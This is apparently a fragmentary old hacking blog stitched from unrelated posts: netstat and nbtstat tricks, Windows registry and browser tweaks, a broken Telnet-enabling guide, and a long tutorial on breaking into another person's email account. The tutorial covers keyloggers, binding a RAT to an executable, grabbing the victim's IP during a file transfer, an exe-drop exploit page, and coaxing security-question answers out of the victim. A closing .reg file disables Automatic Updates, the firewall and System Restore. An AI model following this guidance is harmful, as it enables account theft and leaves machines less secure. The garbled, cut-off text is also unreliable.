if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.
This is the output in your netstat.The 5101 number port is where the Attacker is
connected.
Active Connections
3) so what next???
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can
C:\>nbtstat -A 194.30.209.14
---------------------------------------------
What to do next??
So the conclusion is never exchange files , video or audio till you know that the user
Labels: dos attack, hack, hack while chatting, hacking, hacking a pc, pc hacking, yahoo, yahoo hacking
* On the right pane ==>> right-click and choose new Dword value .
* Rename it as Plural.
☺ ☺ Enjoy ☺ ☺
You can change the title bar for the Windows Media Player
1. Start Regedit
2. Go to HKEY_USERS \ .DEFAULT \ Software \ Policies \ Microsoft \
WindowsMediaPlayer
3. Create a string value of TitleBar
4. Give it a value of whatever you want to appear in the title bar
Go to start->run
Type regedit
press enter
in registry editor go to
HKEY_CURRENT_USER->Software->Microsoft->Internet explorer->main
double click on that and change the value data with anything u want
and click ok
press F5
this will increase the receiving capacity of your input port and thus ur netspeed will be
increased
Labels: crack admin account, cracking, gmail hacking, hacks, increase surfing speed, increase ur browsing
1. Type "about:config" into the address bar and hit return. Scroll down and look for the
following entries:
network.http.pipeliningnetwork.http.proxy.pipeliningnetwork.http.pipelining.
maxrequests
Normally the browser will make one request to a web page at a time. When you enable
pipelining it will make several at once, which really speeds up page loading.
delay" and set its value to "0". This value is the amount of time the browser waits
If you're using a broadband connection you'll load pages 2-3 times faster now.
Labels: cracking, firefox, gmail hacking, hacking, increase ur browsing speed, mozilla, net speed
Things tO Need
7. Just GO TO
Adrian\HKEY_LOCAL_MACHINE\SFTWARE\Microsoft\Windows\TelnetServer\1.0
On The Right Hand Double Click On The Key Named As "NTLM"(New BOx Appear)
Value Name:NTLM
Base :HexaDecimal
Press OK.
12.Press Finish And Then Close The "Add StandALone Snap-in"Dialogue Box.
Aplications>Services
15.On The Right Hand Scroll down And Right CLick At "Telnet"And Select Restart Option.
16.Leave It As It is
Login:Administrator
PassWord:********(Enter)
*-----------------------------------------------------------
C:dir(Enter)
Thats It!
Labels: computer, computers, cracking, cracks, hacking, hacks, pc hacking, registry, remote access, web
hacking
mail hacking
Hey friends
ANd even if you crack into their server it is not possible to decode the password
If u have physical access(direct access) to someone's PC and u want to hack his account
password then it is the best thing for us.U don't need anything better than that,all u hv
KEYLOGGER:-This are the program which records the every keystrokes on keyboard
which means it will record all passwords also.The data will be stored on the victims
computer only(they r stored in one file which is usually located in system folder) but as
some keyloggers are hidden so the victim will not hv ne clue abt it and ur work will be
done easily
Most of u will say that u don't hv direct access to the victim's pc.It is little difficult to
In this kinda situaions u can use trojan's for this.There r many trojans available on
internet.U can find many just by googling.If u want u can scrap in my orkut profile.
http://www.orkut.com/Profile.aspx?uid=18239363529693171422
Well of course most of you out there will say that you don't have physical access to
your target's computer. That's fine, there still are ways you can gain access into the
desired email account without having to have any sort of physical access. For this we
are going to go back onto the RAT topic, to explain methods that can be used to fool
the user into running the server portion of the RAT (again, a RAT is a trojan) of your
choice. Well first we will discuss the basic "send file" technique. This is simply
convincing the user of the account you want to access to execute the server portion of
your RAT.
To make this convincing, what you will want to do is bind the server.exe to another *.
exe file in order to not raise any doubt when the program appears to do nothing when
it is executed. For this you can use the tool like any exe file to bind it into another
On a side note, make sure the RAT of your choice is a good choice. The program
mentioned in the previous section would not be good in this case, since you do need
physical access in order to set it up. You will have to find the program of your choice
yourself (meaning please don't ask around for any, people consider that annoying
behavior).
If you don't like any of those, I'm afraid you are going to have to go to www.google.
com, and look for some yourself. Search for something like "optix pro download", or
any specific trojan. If you look long enough, among all the virus notification/help
pages, you should come across a site with a list of RATs for you to use (you are going to
eventually have to learn how to navigate a search engine, you can't depend on
handouts forever). Now back to the topic at hand, you will want to send this file to the
The reason why is that you need the ip address of the user in order to connect with the
newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't
matter. What you will do is send the file to the user. Now while this transfer is going
on you will go to Start, then Run, type in "command", and press Enter. Once the msdos
prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip
addresses from left to right. The address you will be looking for will be on the right,
and the port it's established on will depend on the instant messaging service you are
using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it
will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or
So once you spot the established connection with the file transfer remote port, then
you will take note of the ip address associated with that port. So once the transfer is
complete, and the user has executed the server portion of the RAT, then you can use
the client portion to sniff out his/her password the next time he/she logs on to his/her
account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her
to access a certain web page? Then maybe this next technique is something you should
look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and
execute .exe files via malicious scripting within an html document. For this what you
will want to do is set up a web page, make sure to actually put something within this
script into your web page so that the server portion of the RAT of your choice is
While you are at it, you will also want to set up an ip logger on the web page so that
you can grab the ip address of the user so that you can connect to the newly
established server. Here is the source for a php ip logger you can use on your page...
http://www.planet-source-code.com/vb/scripts/ShowCode.asp?
txtCodeId=539&lngWId=8
Just insert this source into your page along with the exedrop script, and you are set.
Just convince the user to go to this page, and wait till the next time they type in their
email password. However, what do you do if you can not contact this user in any way
to do any of the above tricks. Well, then you definately have your work cut out for you.
It doesn't make the task impossible, but it makes it pretty damn close to it. For this we
will want to try info cracking. Info cracking is the process of trying to gather enough
information on the user to go through the "Forgot my Password" page, to gain access
If you happen to know the user personally, then it helps out a lot. You would then be
able to get through the birthday/ zipcode questions with ease, and with a little mental
backtracking, or social engineering (talking) out the information from the user be able
to get past the secret question. However, what do you do if you do not have this
luxury? Well in this case you will have to do a little detective work to fish out the
any information from the profile. Many times users will put information into their
profile, that may help you with cracking the account through the "Forgot my Password"
page (where they live, their age, their birthday if you are lucky). If no information is
provided then what you will want to do is get on an account that the user does not
know about, and try to strike conversation with the user. Just talk to him/her for a
little while, and inconspicuously get this information out of the user (inconspicuously
as in don't act like you are trying to put together a census, just make casual talk with
the user and every once in a while ask questions like "When is your birthday?" and
"Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and
go to the next page to find out what the secret question is. Once you have the secret
question, you will want to keep making casual conversation with the user and SLOWLY
build up to asking a question that would help you answer the secret question. Don't try
to get all the information you need in one night or you will look suspicious. Patience is
a virtue when info cracking. Just slowly build up to this question. For example, if the
secret question is something like "What is my dog's name?", then you would keep
talking with the user, and eventually ask him/her "So how many dogs do you have? ...
Oh, that's nice. What are their names?". The user will most likely not even remember
anything about his/her secret question, so will most likely not find such a question
suspicious at all (as long as you keep it inconspicuous). So there you go, with a few
choice words and a little given time, you have just gotten the user to tell you
everything you need to know to break into his/her email account. The problem with
this method is that once you go through the "Forgot my Password" page, the password
will be changed, and the new password will be given to you. This will of course deny
the original user access to his/her own account. But the point of this task is to get YOU
access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good
luck...
Labels: cracking, cracks, gmail hacking, hacking, hotmail hacking, how to crack into mail account of your
friend, keyloggers, mail hacking, msn hacking, password, password hacking, pc hacking, yahoo hacking
press enter
then type
Labels: admin password, administrator, crack admin account, cracking, hacking, password, password hacking,
; Disclaimer: These tweaks MAY result in serious problems that may require
; resulting from modifications to the registry can be solved. Use this reg file
; ** WARNING: Some of these tweaks may not be suitable for your system. Make sure
; you go through the entire list below so that you may modify it according to
; In case you find a tweak that is not suitable or you plainly dont like it,
; please do not delete it. Instead just comment it out like these notes here.
; Also, when adding your own tweaks, please follow the same format followed here.
; These tweaks have been compiled from a lot of sources on the web, magazines,
; and from some tweaking programs themselves. Thanks for all those who have
;---------------------------------------------------------------------------------
; ------------------------
; ------------------------
; 1 Windows Services
; 2 Desktop Tweaks
; 7 Internet Explorer
; ----------------------
; You can use the semi-colon not only to comment, but also to DISABLE unneeded,
; unknown, or inapplicable tweaks. Its better to comment out a tweak with the;
; [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
; "NoActiveDesktop"=dword:00000001
; The first line is the description of the tweak which is obviously commented (;)
; The dword: stands for REG_DWORD type of keys and HAS to be in a 8 bit hex format
; as shown above. Usually 00000001 means yes or true, and 00000000 means no/false.
; To convert decimal (ordinary) values to hex, you can use the windows calculator
; Note: You can directly jump to the various sections of this file by simply
; searching for the index number. Eg, if you search for (7/9), you'd directly
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;------(1/9)-------------------Windows Services--------------------------------------
; Note: Change the values to set the services to automatic, manual or disable
; 00000002 = Automatic
; 00000003 = Manual
; 00000004 = Disabled
;Alerter
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Alerter]
"Start"=dword:00000004
;Automatic Updates
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS]
"Start"=dword:00000004
;ClipBook
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSrv]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\helpsvc]
"Start"=dword:00000004
;ICF/ICS
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ImapiService]
"Start"=dword:00000004
;Indexing Service
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CiSvc]
"Start"=dword:00000004
;IPSEC
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PolicyAgent]
"Start"=dword:00000004
;Messenger Service (to stop spam. Does not affect MSN or Windows Messenger)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Messenger]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NVSvc]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SysmonLog]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDSessMgr]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSDPSRV]
"Start"=dword:00000003
;System Restore
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice]
"Start"=dword:00000004
;TCP/IP Helper
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LmHosts]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\upnphost]
"Start"=dword:00000003
;UPS
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPS]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WZCSVC]
"Start"=dword:00000002
;------------------------------------------------------------------------------------
;--------(2/9)------------------Desktop Tweaks---------------------------------------
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoActiveDesktop"=dword:00000001
;Disable ClearType
;[HKEY_CURRENT_USER\Control Panel\Desktop]
;"FontSmoothing"="2"
;"FontSmoothingType"=dword:00000001
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\services]
@=hex(2):53,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,00,00
"SuppressionPolicy"=dword:4000003c
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\services
\command]
@=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,79,00,73,
00,74,00,65,00,6d,00,33,00,32,00,5c,00,6d,00,6d,00,63,00,2e,00,65,00,78,00,
65,00,20,00,2f,00,73,00,20,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,
00,6f,00,6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,
32,00,5c,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,2e,00,6d,00,73,
00,63,00,20,00,2f,00,73,00,00,00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\services]
@=hex(2):53,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,00,00
"SuppressionPolicy"=dword:4000003c
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\services
\command]
@=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,79,00,73,\
00,74,00,65,00,6d,00,33,00,32,00,5c,00,6d,00,6d,00,63,00,2e,00,65,00,78,00,\
65,00,20,00,2f,00,73,00,20,00,25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,\
00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,\
72,00,76,00,69,00,63,00,65,00,73,00,2e,00,6d,00,73,00,63,00,00,00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSharedDocuments"=dword:00000001
[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:70,10,00,20
"CallForAttributes"=dword:00000040
[HKEY_CLASSES_ROOT\lnkfile]
"IsShortcut"=-
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\Tour]
"RunCount"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"EnableBalloonTips"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop
\CleanupWiz]
"NoRun"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\ControlPanel\NameSpace\{D20EA4E1-3957-11d2-A40B-0C5020524153}]
@="Administrative Tools"
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}]
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}\DefaultIcon]
@="%SystemRoot%\\\\System32\\\\nusrmgr.cpl,1"
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}\Shell]
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}\Shell\Open]
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}\Shell\Open
\command]
@="Control Userpasswords2"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\ControlPanel\NameSpace\{98641F47-8C25-4936-BEE4-C2CE1298969D}]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"ForceClassicControlPanel"=dword:00000001
;[HKEY_CURRENT_USER\Control Panel\Desktop]
;"PaintDesktopVersion"=dword:00000001
;----------------------------------------------------------------------------------
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"CascadeControlPanel"="Yes"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"CascadeNetworkConnections"="Yes"
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
;"CascadeMyDocuments"="Yes"
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
;"CascadeMyPictures"=Yes"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsMenu"=dword:00000001
;[HKEY_CURRENT_USER\Control Panel\Desktop]
;"MenuShowDelay"="10"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSMConfigurePrograms"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_ShowControlPanel"=dword:00000002
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
;"Start_ScrollPrograms"=dword:00000001
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
;"Start_NotifyNewApps"=dword:00000000
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\MenuOrder\Start Menu]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\MenuOrder\Favorites]
;[HKEY_CLASSES_ROOT\Applications]
;"NoStartPage"=""
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoStartMenuMFUprogramsList"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoStartMenuMFUprogramsList"=dword:00000001
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoUserNameInStartMenu"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoUserNameInStartMenu"=dword:00000001
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoStartMenuMorePrograms"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoStartMenuMorePrograms"=dword:00000001
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"ClearRecentDocsOnExit"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"ClearRecentDocsOnExit"=dword:00000001
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
;"EnableBalloonTips"=dword:00000000
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
;"EnableAutoTray"=dword:00000000
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
;"TaskbarGlomming"=dword:00000000
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
\Advanced]
;"TaskbarGlomming"=dword:00000000
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoTrayContextMenu"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoTrayContextMenu"=dword:00000001
;----------------------------------------------------------------------------------
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail]
;"MessageExpiryDays"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllowMultipleTSSessions"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction]
"Enable"="Y"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsHistory"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsHistory"=dword:00000001
;[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
;"PowerOffActive"="1"
;"ScreenSaveActive"="1"
;"SCRNSAVE.EXE"="(None)"
;[HKEY_USERS\.DEFAULT\Control Panel\PowerCfg]
;"CurrentPowerPolicy"="0"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\CabinetState]
;"FullPath"=dword:00000001
;"FullPathAddress"=dword:00000001
"Settings"=hex:0c,00,02,00,1b,01,e7,77,60,00,00,00
errors)
[-HKEY_CLASSES_ROOT\.avi\ShellEx]
[-HKEY_CLASSES_ROOT\.mpg\ShellEx]
[-HKEY_CLASSES_ROOT\.mpe\ShellEx]
[-HKEY_CLASSES_ROOT\.mpeg\ShellEx]
;This adds the "Open Command Window Here" on the right click menu for folders
;[HKEY_CLASSES_ROOT\Directory\shell\cmd]
;[HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
;[HKEY_CLASSES_ROOT\Drive\shell\cmd]
;[HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
;[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\Notepad]
;@="Notepad"
;[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\Notepad\command]
;@="C:\\Windows\\notepad"
;[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex
\ContextMenuHandlers\Copy To]
;@="{C2FBB630-2971-11D1-A18C-00C04FD75D13}"
;[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex
\ContextMenuHandlers\Move To]
;@="{C2FBB631-2971-11D1-A18C-00C04FD75D13}"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"link"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\SystemRestore]
"DisableSR"=dword:00000001
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
;"Hidden"=dword:00000002
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo\OpenWithList]
"a"="NOTEPAD.EXE"
"MRUList"="a"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo\OpenWithProgids]
"nfo_auto_file"=hex(0):
;NoLowDiskSpaceChecks (won't check if you are low on diskspace and pop up a balloon
telling you)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiskSpaceChecks"=dword:00000001
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\BitBucket]
;"NukeOnDelete"=dword:00000001
;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]
;"AutoRun"=dword:00000000
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies
\Explorer]
;"NoDriveTypeAutoRun"=dword:00000091
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoDriveTypeAutoRun"=dword:00000091
;Disable CD Burning
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoCDBurning"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoResolveTrack"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System]
"NoInternetOpenWith"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"InternetOpenWith"=dword:00000000
[-HKEY_CLASSES_ROOT\.zip\CompressedFolder]
[-HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]
"AutoReboot"=dword:00000000
;Speed up shutdown
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"HungAppTimeout"="1000"
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"HungAppTimeout"="1000"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"AutoEndTasks"="1"
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\PrefetchParameters]
"EnablePrefetcher"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"EnableQuickReboot"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting]
"DoReport"=dword:00000000
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
;"LogonType"=dword:00000000
[-HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\ContextMenuHandlers
\ShellImagePreview]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
;"forceguest"=dword:00000000
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\RemoteComputer\NameSpace\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\RemoteComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"SynchronousMachineGroupPolicy"=dword:00000000
"SynchronousUserGroupPolicy"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache]
;"SyncAtLogon"=dword:00000000
;"SyncAtLogoff"=dword:00000000
;"NoReminders"=dword:00000001
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\NetCache]
;"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\stisvc]
"Start"=dword:00000004
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"NoNetCrawling"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\Explorer]
"NoRemoteRecursiveEvents"=dword:00000001
;Optimize the Windows Server Service (1=minimise memory, 2=balance, 3=max netw.
throughput)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"Size"=dword:00000002
;Use 00000001 for security reasons or if your pagefile usage is always high
;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
;"ClearPageFileAtShutdown"=dword:00000001
;----------------------------------------------------------------------------------
;-----(5/9)--------------------System/Hardware Tweaks------------------------------
;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
\Environment]
;"TEMP"="N:\\Temp"
;"TMP"="N:\\Temp"
;Disable sticky keys (Popups up when pressing shift for some time, accessibility)
[HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys]
"Flags"="506"
;Disable the NTFS Last Access Time Stamp (speeds up viewing folders in ntfs)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisableLastAccessUpdate"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"SystemPages"=dword:0000C350
;Show Run in Separate Memory Space Option to run 16 bit programs in VDM
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"MemCheckBoxInRunDlg"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"MemCheckBoxInRunDlg"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\AlwaysUnloadDLL]
"Default"="1"
;Improve Core System Performance **** WARNING : Requires atleast 512 MB RAM!
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"DisablePagingExecutive"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"IoPageLockLimit"=dword:00020000
;Speeds up drives
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-
BFC1-08002BE10318}\0000]
"EnableUDMA66"=dword:00000001
; If you dont know the L2 cache of your CPU, use a freeware program like CPU-Z
; http://www.cpuid.com/cpuz.php
; 8192 KB = 00002000
; 4096 KB = 00001000
; 2048 KB = 00000800
; 1024 KB = 00000400
; 512 KB = 00000200
; 256 KB = 00000100
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"SecondLevelDataCache"=dword:00000800
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\PriorityControl]
"Win32PrioritySeparation"=dword:00000026
